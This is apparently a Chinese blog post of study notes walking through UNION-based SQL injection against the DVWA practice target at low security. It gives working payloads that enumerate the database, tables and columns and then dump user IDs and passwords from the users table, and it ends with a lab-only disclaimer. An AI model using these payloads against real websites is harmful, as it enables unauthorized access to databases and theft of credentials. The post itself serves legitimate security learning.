web安全学习笔记(三)——SQL注入靶机测试

今天尝试了SQL注入靶机爆库爆表操作,分享如下:
1.设置靶机安全级别为低级
low
2.进入SQL注入界面
SQL注入界面
3.输入1提交
输入1提交
3.用单引号让id闭合,输入1’ union select 1, database()#(此处做补充说明下,语句闭合时在数据库执行的SQL语句如下:“select frist_name,surname from 表名 where user_ID=‘1’ union select 1,database()”,所以构架关联的时候字段为2,获取你所需要获得的信息;如只有一个就加上1或其他,补足关联表后所需字段内容。)
爆出数据库名称
4.既然知道了数据库,就尝试爆出数据库中的表,输入
1’ union select 1,table_name from information_schema.tables where table_schema=‘dvwa’#
爆表
5.爆出表名如上图所示,尝试爆出users表的列,输入
1’ union select 1,column_name from information_schema.columns where table_name=‘users’#
爆列
6.关注该表中的关键字段id和password,尝试爆数据,输入
1’ union select user_id,password from users#
爆数据
该内容仅用于学习,请遵守国家相关法律法规,不要将技术用于非法行径,学习时请不要对网站进行操作,共同维护绿色网络环境,请使用靶机进行练习。

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值